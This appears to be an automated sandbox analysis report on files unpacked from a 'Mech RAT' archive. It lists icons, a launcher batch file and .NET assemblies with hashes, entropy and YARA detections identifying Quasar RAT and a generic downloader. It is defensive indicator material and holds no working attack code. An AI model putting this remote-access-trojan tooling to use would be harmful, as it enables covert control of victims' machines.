                                                                                    Preview:......00.......%......(...0...`..... ......%...................................................................................................................................................................................................................................C.P.=...8...2...2...?...O...N...N...O...P...P...Q...Q...Q...O...O...O...P...O...P...P...P...P...P...Q...Q...Q...Q...Q...R...R...Q...P...Q...N...7...>...D..)O.?.................................`...V...X...X...X...X...X...Y...Y...Y...Y...Z...Z...Z...Z...Z...Z...Z...Z...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[..._......................................8...8...8...8...8...8...8...8...8...8...8...8...8...8...8...8...8...8...8...8...8...8...8...8...8...8...8...8...8...8...8...8...8...8...8...8...8...8......................................?.........................................................................................................................................................
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:MS Windows icon resource - 6 icons, 256x256, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                    Category:dropped
                                                                                    Size (bytes):370070
                                                                                    Entropy (8bit):2.1535405973266575
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:AyIh9xb9bexqcmOg1/JuiiiiiilllllioiiiilllliiiiiuGxbu:9Ih9Z91hJy
                                                                                    MD5:E6FEC4185B607E01A938FA405E0A6C6C
                                                                                    SHA1:565E72809586E46700B74931E490E2DC1E7E3DB1
                                                                                    SHA-256:2E2F17B7DD15007192E7CBBD0019355F8BE58068DC5042323123724B99AE4B44
                                                                                    SHA-512:13DAEB2BF124E573590359F18A1D962157DC635A88319C9ED1A2E8CCAD6322FB081579E1E8FBE62FFE55C8286C2BC8ACB251D572A4BEB00641AD5009A380E513
                                                                                    Malicious:false
                                                                                    Preview:............ .( ..f......... .h.... ..00.... ..%...$.. .... ......J........ .(...F[..@@.... .(B..nc..(............. ...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:MS Windows icon resource - 6 icons, 256x256, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                    Category:dropped
                                                                                    Size (bytes):370070
                                                                                    Entropy (8bit):2.1516742045936668
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:FY9tDXICTUj6Q+CUsn2JiAAA/////////A+AA////////AAAiA////kujYYFsG3I:+PMXT0
                                                                                    MD5:0C24EDEC606ABDA7C6570B7DCF439298
                                                                                    SHA1:4478A102892E5EB4BB1DA8E9C62D17724965691A
                                                                                    SHA-256:8FC693238AFC49A8098DAC1762BFAE891E818BB84749C6EEF5F1B0C6C8FFDDB2
                                                                                    SHA-512:F8DE3FFB8F9FE1394B3626AE5616213D4612B43F0635FA9053D74AC6FE536657E796289487F245B8ABFF74F1DE8368C0DF8E56BF21F540366ED86A378649EA24
                                                                                    Malicious:false
                                                                                    Preview:............ .( ..f......... .h.... ..00.... ..%...$.. .... ......J........ .(...F[..@@.... .(B..nc..(............. ...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:MS Windows icon resource - 6 icons, 256x256, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                    Category:dropped
                                                                                    Size (bytes):370070
                                                                                    Entropy (8bit):2.1196393199521024
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:0nnnnnnnnnnnnnnnnnnnnnnnQInU2/gohN/yRUZZZZZZZZZZZaaa0KaaILjeuFgZ:Rkccckccccct
                                                                                    MD5:E3143E8C70427A56DAC73A808CBA0C79
                                                                                    SHA1:63556C7AD9E778D5BD9092F834B5CC751E419D16
                                                                                    SHA-256:B2F57A23ECC789C1BBF6037AC0825BF98BABC7BF0C5D438AF5E2767A27A79188
                                                                                    SHA-512:74E0F4B55625DF86A87B9315E4007BE8E05BBECCA4346A6EA06EF5B1528ACB5A8BB636EF3E599A3820DBDDCF69563A0A22E2C1062C965544FD75EC96FD9803FC
                                                                                    Malicious:false
                                                                                    Preview:............ .( ..f......... .h.... ..00.... ..%...$.. .... ......J........ .(...F[..@@.... .(B..nc..(............. ...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:MS Windows icon resource - 5 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                    Category:dropped
                                                                                    Size (bytes):99678
                                                                                    Entropy (8bit):4.2695987261209645
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:5As1Fd6jrW6QKysmsolxc4nvPQIfjRuw+mqbz9j1MWLQes2aXS5Cjr:5AMwflmsolaTIrRuw+mqbz9j1MWLQs2
                                                                                    MD5:14465D8D0F4688A4366C3BF163BA0A17
                                                                                    SHA1:9F1FA68A285DB742E4834F7D670CAE415CE6B3B6
                                                                                    SHA-256:3F3C5CE486E5B9FA88DC60B60916053E8808C69167DF1A11287FD3CD6DB1CA6E
                                                                                    SHA-512:01DB4FAC75136BAF9C162265785877B21FBA9C4B8D9DBE4E495191F15AA9C914E3D5BAF1C4606041279A7138C7E5C8F4CCF6E64689354FC3FB3FA66AB3B1DA2D
                                                                                    Malicious:false
                                                                                    Preview:......00.... ..%..V... .... ......%........ .h....6..@@.... .(B...;........ .(...6}..(...0...`..... ......$.........................................................................................................................................................................................................................................O.......}...}...}...}...}...}...}...}...}...}...}...}...}...}...}...}...}...}...}...}...}...}...}...}...}...}...}...}...}...}...}...}...}.......s...*.......................................*Bgq......W...;........................................................................................................................................%........................................@"....B..................................................................KK..MM..""..................................................................%%l........................................@....................................................................uu..............DD
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:MS Windows icon resource - 1 icon, -128x-128, 32 bits/pixel
                                                                                    Category:dropped
                                                                                    Size (bytes):67646
                                                                                    Entropy (8bit):4.383177716108049
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:keGRHCUZYDikdQarfw8lGqMtxoYDQqrp0KR1QCOICdu2kkyPgE+zi/hScVsUIGVN:8fY/lVoTlR1vCU/he6H
                                                                                    MD5:167425A3FA7114B1800AA903ADC35B2A
                                                                                    SHA1:601E8BD872EA31AFF03721A0361E65A57B299CAD
                                                                                    SHA-256:12F600B09C0DB00877684A950FC14936ECC28DF8F0DDC6821D68E4B82077AD92
                                                                                    SHA-512:586CE1360EB06F1DF8E95AD178ABFAE7C9D41CBA1BE55276B3D3947D0504CA09185E543B7DBF1BA72DDE4942FF626859A6D2E8A1FAAAF6C5DAAEBD8740DCF538
                                                                                    Malicious:false
                                                                                    Preview:............ .(.......(............. .....................................................................................................................................................................................................................................333.333.+++.$$$. . .........333.333.........................333.333......... . .$$$.+++.333.333.....................................................................................................................................................................................................................................................................................................................................................................................................333.$$$. . .333.........'''.;;;.777.333.000.---.999.999.999.999.666.666.999.999.999.999.---.000.333.777.;;;.'''.........333. . .$$$.333...................................................................................................
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:MS Windows icon resource - 6 icons, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 32 bits/pixel, -128x-128, 32 bits/pixel
                                                                                    Category:dropped
                                                                                    Size (bytes):115478
                                                                                    Entropy (8bit):5.809600725069547
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:WE4NpLpq8Bb7RFRz8nqF+o2Hc0cccwccyccxcccMcccNmccdccccTccccncccNJ+:j4NpVq8BxFRzaqF+o2GQJ7/JzqVfGv2
                                                                                    MD5:F1463F4E1A6EF6CC6E290D46830D2DA1
                                                                                    SHA1:BDA0D74A53C3F7AAF0DA0F375D0C1B5ACA2A7AAF
                                                                                    SHA-256:142B529799268A753F5214265C53A26A7A6F8833B31640C90A69A4FF94CEE5EC
                                                                                    SHA-512:0FA93D009CC2F007D19E6FDDA7EBE44C7ED77F30B49A6EF65C319133C0570AB84F2D86E8282B5069D7F2E238547722AC3966D2FA2FAE4504133F0001A0387AE2
                                                                                    Malicious:false
                                                                                    Preview:............ ..=..f......... .(....>..@@.... .(B..6F..00.... ..%..^... .... ............... .h........PNG........IHDR.............\r.f..=oIDATx..w|.....w...a.w.7....B.._......BB !.o.....R..j ..l.{3n`..n.Fn.eu]...j.........i?..X...3.{.<....8Hi.=!... .....7........o..< ...n.-....>..........9.... 8 ....v.xw}].........}.=)CJ.X....n.o,0.(i.....E.YD.....B.....[.r`..b.>6..x./...At8..f.6s.G.9E..`*0... K..J.....`...X-.........D>O...(.$c......X......_...GX.L.t!l...X....%...xwm....18. ..9c.'....I.BZ...J... .~`-..X.......[.=P.1.Q......K$..............:.....E...|{.!.n...Q.q.............uo.P....i...?y....GJ.....18..Bl.1>......R.L.n..Q.J.....^....g....I=Z.G...#G.Wq...b.t '..Q.1+.`..O...w..-.|S....p..Il.1.(....F06....,U..._..[h..o..V..AW8.. ...7..>p.....St.@..@.....A.:..._......P...2Q.5..\#`...pG...8...)Z..7.{{.+.[..3..-s&i..=..9.Uy...:. |..+..O...h....\.P..'.Q.a..l...\.......8. e.@;6.7f6g<U..G.".....P9i.........p4..H9.....e?Q.9...u.....i-..d........H.v.[k.S.R...+.-
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:MS Windows icon resource - 6 icons, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 32 bits/pixel, -128x-128, 32 bits/pixel
                                                                                    Category:dropped
                                                                                    Size (bytes):134903
                                                                                    Entropy (8bit):5.838260652902566
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:Ms6se7llqn17KineXd2wwKtivEYoNRh8RX9EIKhI49NT:MsgbcUieNJHKoPC5+Ld
                                                                                    MD5:A512719EFC9E6ECC5E2375ABCEB1669A
                                                                                    SHA1:51FAE98EDFAB7CD6B6BAAC6DF5ECBDA082EEB1DB
                                                                                    SHA-256:B2F7FB22CD5B935CF19A2F58F7FEF9DB99DB40772FF4BB331A73C345161C2574
                                                                                    SHA-512:E0153DBC8F3FDDA8D1A7082BC30A3895D7F4B3BC2982B4B4ECE55653D1B4C293EBA3BA6D4A0A581F0F7DB95AB287D6616EF7BF03AF4485904111798BF9D9E625
                                                                                    Malicious:false
                                                                                    Preview:............ .....f......... .(......@@.... .(B......00.... ..%..?... .... ............... .h........PNG........IHDR.............\r.f....IDATx..w.$Gu...gf..|.;.P".JHH..H..!0.`..a.166`..69.&...&..@ ..@9K'.N..;]....~.?:UWWu......g..^.....+4..,<.@Gx...x..1..0...t.Su.]:.I3._7.f...0.e.#,.......t{~.`....~.:B.|.88F]8.m..Y..}.:...j.v...,L..j..._.......z.x.L....d..0..`..0...8.`..#f.F..Y..L....f5.Y.@#Z.'.pd.4O..S.?..v...,.......^.@.0.9.......p.L7...f..,.7.#..>..2...(.y...0.|XGfM..,.......d.q.....8...L..3...;.r.Y./@G8...hB.....32L..@..b.....{f...W...fa.!^..!..@.2O...'.E.._...g....0..fa........A.\..........#.B.0..faFA.a..)B.!(Y..:1....^>...x.Y.0.3..o....+....D.a'|LGx.L?...f..,.......C6....@.$.;.|UGX3...x.Y.0.3.-.... Z.S....q..].|#^J<.5`..........2.l.......$.K:Bk.......`.f..y;B~......Z'C..N.....J.j.e....A....\.C...^4. r....W..5;=X..n.,......a....,FX.2.a."...@....h.&Tt..qDw!.Dt;.[..Da.xs.N.}sxKQ./.B.Mh=.&..p...v`3.}...+.U..........9..C.9.a."..Y.3.&"1q'...I.......;
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:MS Windows icon resource - 6 icons, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 32 bits/pixel, -128x-128, 32 bits/pixel
                                                                                    Category:dropped
                                                                                    Size (bytes):128774
                                                                                    Entropy (8bit):6.18435580616356
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:zVRUhw3TWxcZss+SP21wH7QOK/PPLr8zdYpizfgMRHGuTRLJHPxDsPsx3CXhRcVN:ZRUGKXs+S++7KFSbxeY+qDDrMY
                                                                                    MD5:9C053BEF57C4A7B575A0726AF0E26DAE
                                                                                    SHA1:47148D30BC9A6120A1D92617BF1F3E1BA6CA1A2C
                                                                                    SHA-256:5BB21D6C04ED64A1368DACE8F44AFF855860E69F235492A5DC8B642A9EA88E41
                                                                                    SHA-512:482D639BA60F57827D8A343F807F4F914289C45643307EFAA666B584A085FE01AC7892252F41B7756FDE93D215B4F3FED16E608BC45102D320D77239FA93146A
                                                                                    Malicious:false
                                                                                    Preview:............ ..q..f......... .(....q..@@.... .(B..&z..00.... ..%..N... .... ............... .h........PNG........IHDR.............\r.f..q_IDATx..w..Wu.{..lKr..6..c.p......v..I..@...{..H..NBKBB.%.P...i...`...p..$...+].v.....s.M.K..3....3k..Z{.=.%..+~.D.$......20...Y..L.... ..d.......\.1L.. .....%........N.].+.,.9.8.8..D..c@....Y.r(.. ..H+at...'.K.2...$.80....0.............2...<+...Y..$..(..b..2.......p.4A.....-.Q.Q.?......W......'..w.....rgz.......)..]"EK.`....... ..N.....r.p.p... 9..).. ..s...S]..2........z._......S......!-..y.G_qs.8.8.x...3..%..N.)9.MA.@@X..I;...a7.M.. ..7...../.....x..Z..sH.^wk.x(...........R..U1.[~....c....2.m. ..] .c`-.. [n|...|..HK.`..1.n'u.=.x>.s%....&...H....3...5{#..Y.I...@.G".n.v....Y2..HK.`..1.n_.<.x1..S..E.WW/.A`...eJ.LSa..S$....o.k..7>.w....`Z......s9...<....].]..JY......~z#.0 4`.ew..../`.......%S..Z..3...x4. ....V.j.`ZE......j.6.....h...`....1.= ?...\s.S^<...-......e...../!..K........~.^.@.B$x}/_@6.#_0.7@6....:,Q
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:MS Windows icon resource - 6 icons, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 32 bits/pixel, -128x-128, 32 bits/pixel
                                                                                    Category:dropped
                                                                                    Size (bytes):102601
                                                                                    Entropy (8bit):3.0259696734344237
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:sVLDqC6ot/2AlVx1qa6mgIwEk4w00wILxuudXCnadwyHXZ:EH/6A/9d1qDIwEk4w00wsuuXdwyHJ
                                                                                    MD5:9DBDD6972E129D31568661A89C81D8F9
                                                                                    SHA1:747399AF62062598120214CEF29761C367CFD28A
                                                                                    SHA-256:45C85BDAAF0E0C30678D8D77E2585871EA6D1298EE0D30037745BACEA6338484
                                                                                    SHA-512:E52572DE3F0D57D24A24D65ECA4FF638890CCC9C5ACA3F213FF885EDA3C40DE115849EB64C341F557D601F566CE21F8FC0DF25CC4B13AAAD5E941449A6B7F87D
                                                                                    Malicious:false
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:MS Windows icon resource - 6 icons, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 32 bits/pixel, -128x-128, 32 bits/pixel
                                                                                    Category:dropped
                                                                                    Size (bytes):108974
                                                                                    Entropy (8bit):4.669155282743326
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:LZe7enyslZ87gUcXmEHNBFNJC5jWb2NM2:Npysa7iAM2
                                                                                    MD5:D7C9666D30936E29CE156A2E04807863
                                                                                    SHA1:845E805D55156372232E0110E5DC80380E2CB1E5
                                                                                    SHA-256:6EA04CF08751A2F6BB2F0E994258A44D5183B6CDB1471A0EE285659EADA045B5
                                                                                    SHA-512:3CFD7A41F65C5A0DC23A90C6AF358179EFB3AE771F50534C3D76C486FE2D432EA3128A46B4B367C4714E86E8C0862A7385BD80662FE6EA82D7048F453570ED56
                                                                                    Malicious:false
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:Targa image data - Map 32 x 3467 x 1 +1
                                                                                    Category:dropped
                                                                                    Size (bytes):168697
                                                                                    Entropy (8bit):7.105748636848575
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:Y8SKfbzxcwg7es6/Vsb8VKTu549oJMfF/H9N3Ky9NzLn+:YUhcX7elbKTua9bfF/H9d9n+
                                                                                    MD5:7891C91D1761DC8A8846D362E6E31869
                                                                                    SHA1:0229BB01B7B4A0FCA305EB521EC5DFBAA53674EA
                                                                                    SHA-256:29D38C75AF79AA0554F34CDFECB311F88F8DD02B02FACAA299B9700841806AB8
                                                                                    SHA-512:ED14614A706DA985566853DC13DF0D1128A718F39EC9957320813803FE07E59DE337D51033970E2F57D9F56DA3546C506F5F0F3BECFA91CE741576855BE14BA7
                                                                                    Malicious:false
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:MS Windows icon resource - 6 icons, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 32 bits/pixel, -128x-128, 32 bits/pixel
                                                                                    Category:dropped
                                                                                    Size (bytes):110950
                                                                                    Entropy (8bit):5.326047794906225
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:ygjWAisCkoAbhMDB8dfO944J+IiIxzAILEhmtkW9iVHD:yOybBYfOS4J+1oEhyiHD
                                                                                    MD5:AF1739A9B1A1BF72E7072AD9551C6EEA
                                                                                    SHA1:8DA0A34C3A8040C4B7C67D7143C853C71B3D208D
                                                                                    SHA-256:A65CBBDC2CA671A9EDD7EDAC0C6737B3B116E357727E003E5FDEFF163C6C21AB
                                                                                    SHA-512:EEEAC307371C38B75E256083C55A3FE4AB096C1C7520A4B7ACB40FAD3AF5A0D6C88AAF85F2C3E418034ABEE422C2A3BA13731ADF7EE6078016DA4DD2E989B120
                                                                                    Malicious:false
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:MS Windows icon resource - 1 icon, 256x256
                                                                                    Category:dropped
                                                                                    Size (bytes):270398
                                                                                    Entropy (8bit):5.543245919551853
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:HAZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ+ZZZZZZZZZZZZZZZZZZZZZZvZZZ+:H+GIIIIIIIhIIIIIIIIIIIIIIIUP
                                                                                    MD5:3E24E40B41ECC59750C9231D8F8DA40B
                                                                                    SHA1:91A701CF25AEA2984F75846B6C83865D668CCAD6
                                                                                    SHA-256:BD1C33A67244801E828035904882EC53BD2EA8A1DB9265A06D1AA08CF444CA80
                                                                                    SHA-512:FE62EDDDB62DD4B695F1EF40FFB7A0119D480D1C176F0254ACEE19A45D6433EF6C308ACBE567C721018390626C71F7A0F7BCD195D59D54C19CF019F13C4F7572
                                                                                    Malicious:false
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:DOS batch file, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):181
                                                                                    Entropy (8bit):4.409440084125115
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:BKDDkttAZlV8svLkgo2NNoxLoanv2AZOq4NMA7OizM2A7aAq33lFXe+X2:SwTAN8sF9LoNoaOUMmACiQ2A+AqfX+
                                                                                    MD5:AA83EC2039ECFD3A62E463CD7DC3C643
                                                                                    SHA1:20D2D9A5FB08C6CFC2FCED79285DF9436697AF71
                                                                                    SHA-256:1BE31323576FD536E78B9474F94FC84C4A647E8E9E98C2F357D5B34D1F924C37
                                                                                    SHA-512:54C6587C01E9F1575AB10A3224241BA8E9CEB17B219F8DD0F5265B596264A233FC53DB1C4BA98CC883ED130828A59128D20DFE65A7B29F916C420A612336BCCC
                                                                                    Malicious:false
                                                                                    Preview:.@echo off..REM use this if Server does not open..REM only use if it does open....REM Change this to the der of Mech Server..start Mech Server....exit....REM just run after saving
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):57344
                                                                                    Entropy (8bit):4.954230269315775
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:qYnDJGdu2oE3d7ltSl+Y8sCcm8Doi/L0CPw87qquEZ+r3FhuiFJ8G:VncoU48/AzPwYpNZ6rXJ8G
                                                                                    MD5:BFB3BD1CB571360435100BFA6ED2B997
                                                                                    SHA1:1325E8DD76180A165117E04DA4EE4A020E996880
                                                                                    SHA-256:A67A424013544C8270C12633E2E1E287CD5CF0B3F2E81E8D8204B37A03DA59EF
                                                                                    SHA-512:AE5A88A9E86B9E64B8C289213F814586DFA5FE5E0CC21BDBC3E48C36D81FA9E763C6E78F24E40DF07696228270AD72F408846125E61E33CAE867EF8FF88A3C15
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):2156424
                                                                                    Entropy (8bit):5.825972764437023
                                                                                    Encrypted:false
                                                                                    SSDEEP:49152:1BGZRDJCizd4UwKGU2pFumG5sx9YzhJY+9O5L9uuKOHHT58agrj7fsfnbDF17F3A:zmC17Fw
                                                                                    MD5:DF5DD00BFA6F9B477CBD59CBDDB75A00
                                                                                    SHA1:EFC2B30AA830444FA5159FF8DF187A8E7B5B6AB5
                                                                                    SHA-256:163A2AA94061D1ED03C19C41D9F18E0CBAE3A8F71FE78A46EF332E5DF39C8DA5
                                                                                    SHA-512:3D8405EEF2F19E40358ED91069C295911F67AEAFF7A440B98E01A9799E485526DB9788AAED99E5E046C6755AA075B6DE9A0991F99F553A3EDF334748A77ADF10
                                                                                    Malicious:true
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Guna.UI2.dll, Author: Joe Security
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):1882112
                                                                                    Entropy (8bit):7.653685332295367
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:VBOhYWy4K8A0FX+qmzJuIIIJlvQTl/+bXSIIrIII3KIIIIIIIIIIedRmfNclV:ry2u0FVAcV
                                                                                    MD5:1D2F632A4793126BBE684D1ED5BBE2B8
                                                                                    SHA1:D65A862A3179676BB38FD67178FD04E96554806F
                                                                                    SHA-256:2C832B203E3A0923958116CBE92FC553DD7004191D7B4948656680CAD0B17B36
                                                                                    SHA-512:1F8EA6634BAAFB2ADF78DD0B16C5207EB6DD4F972F47A73319F2FF6B1410FE36C778BF0A576A1D40D99B65A43B7CC15B714CE53DA659AF5C05892D8A71F9A93D
                                                                                    Malicious:true
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mech Server.exe, Author: Joe Security
                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mech Server.exe, Author: Joe Security
                                                                                    • Rule: MAL_QuasarRAT_May19_1, Description: Detects QuasarRAT malware, Source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mech Server.exe, Author: Florian Roth
                                                                                    Antivirus:
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 53%
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):29584
                                                                                    Entropy (8bit):6.437352220756666
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:MoGlVXd5QgRbo/cqR3gMdny654nKDdhUauvc//FyHRN76JVOY/wR9zmuyzy1:wDOgRcOIUarFu4/M9zmO1
                                                                                    MD5:2E02F737BAABDA557D62C88443AE7C01
                                                                                    SHA1:A4F3A6A3B7C5D371474FBB9A4D51F0E75ECC0927
                                                                                    SHA-256:2570CBE12E3F6C177362EAAD630B42DB3114C2BB74099A0BAA2D3ABD6BCB5303
                                                                                    SHA-512:646C34A76DD20C808346E87BD68C6074FDDC3194DF0CFBAB345E2E08D8D480FDECD6E544836A07F74898D4276FD7F30B964AA0FA260178492639913E7BEAB650
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):15760
                                                                                    Entropy (8bit):6.733319284573964
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:LnIqrxCb3j0WZqnWSW1R7KOTYRHnhWgN7a8WqJ2sJact5equ/X01k9z3Amj7x+M:Ln98j0WZqnWlyHRN799Es56/R9zTjVP
                                                                                    MD5:B0F2E37DC0FBE6CF01672547F9E56E5B
                                                                                    SHA1:2673EB1AB737217E0DC63101D697697C82547185
                                                                                    SHA-256:3A4ED9B3E4B5D706767EF614B52836250E8ABFADB7B8E30E3706C2EB9D1C45E3
                                                                                    SHA-512:8C5F91A0A7BCD44D3F4A61D7F37F9956F7AA0F1D3585460C2EB1F27BB28E6B959F1E3E7ACE6B1FE2C39B06C121D024B6BD383CA3C403AB70DFBB94208476E6DE
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):159144
                                                                                    Entropy (8bit):6.117628890515304
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:vIOjCZch+OpRvMKZNZ3hy3B5HZtdOu8uThF9hZlJ8jaoY:jGZc5HvMKZ73Y3B5HZtdOu8ShZlJ8+l
                                                                                    MD5:2DDC54871FF84B3692AD11BA4A5FF771
                                                                                    SHA1:C5310FEA5760851117EC68B66363F65D5FAE06A3
                                                                                    SHA-256:CB1D59FD79A412B1B05A27B32C342CBC85F018A9F1E1D67B43EBE87E43FEC0D1
                                                                                    SHA-512:C4B6F1F0A1517B7669813F58ECE0B10432DD85E1769584B5502CBB0BF0B440A56353B1B5142AA024886D0A4CABE9447C8EA6173887CA9C7562E5883DEAC07EF0
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):19360
                                                                                    Entropy (8bit):6.517514926671992
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:jFNFUt+ZDmwKCWKhyHRN7/FfsRmuTcR9zuskT:jF7kwDhutERmuU9zuR
                                                                                    MD5:F0BF68CED49E25D46F470D063B9B2532
                                                                                    SHA1:5826195D195BA3317B22FB726E60231E800571EC
                                                                                    SHA-256:C4494B603ECB322627959B2CD782400405A58051229BD09B108861415B1845AA
                                                                                    SHA-512:01EFF16E40FADAB3ACC906C3D7B046363649157FF152A58BABFF0E7300861B16DE8254237B6F39DC781BB2B0609F24EC8EDBC816B1DDA27BFA71D8816C3470C6
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):114576
                                                                                    Entropy (8bit):5.987882575161398
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:OCqy+HpgqVw2LexT+15prQSndipRELKihtj5yF6C3MNflzlrD7XdzgM7QgKAh8NQ:oJSYw3ip0aRKihtj5RCgzJxt8NYGi
                                                                                    MD5:A07CD0C9F5B3308A0F2AFE11D67FD60C
                                                                                    SHA1:3E35FFD0632C2BA0E12075F3A59A215BAE4412DE
                                                                                    SHA-256:6536ABA7C1F99CEA9D373773CD0CACF130B0DDFBF47E2C8ACAF4CD880E318045
                                                                                    SHA-512:9FA70DE6B0252E3F852B7CAA6923B7E1221CEF7BFBE9DB10D34E07E2EE5366593621B9C5EA1C8E3E4CCB161CAC128E778B4B38882F82F229A9E0D7C32DB5529D
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):34728
                                                                                    Entropy (8bit):6.273323392024227
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:cfuKfVp4MAfCQxA5Xm9nCSqu1LxWF//dj9zw:64nHI29dqudxWZzw
                                                                                    MD5:E3306BF4A03B415EEAF5E3038245146C
                                                                                    SHA1:7C1287FB75CF863BF61D315A5DC6AC21BC224584
                                                                                    SHA-256:8D1C36B6DCED0B1315E71303EF205DBD01D157A4ADD72D874825E0F26C529AA5
                                                                                    SHA-512:C1360BFD93A0AEDBC06C58C79B3FFD6B5599D70B49F5F894BC793332F27F315ED6E3609984A269201064E73987517109FE6B720CECB38FC67EE08E1258CF843C
                                                                                    Malicious:true
                                                                                    Antivirus:
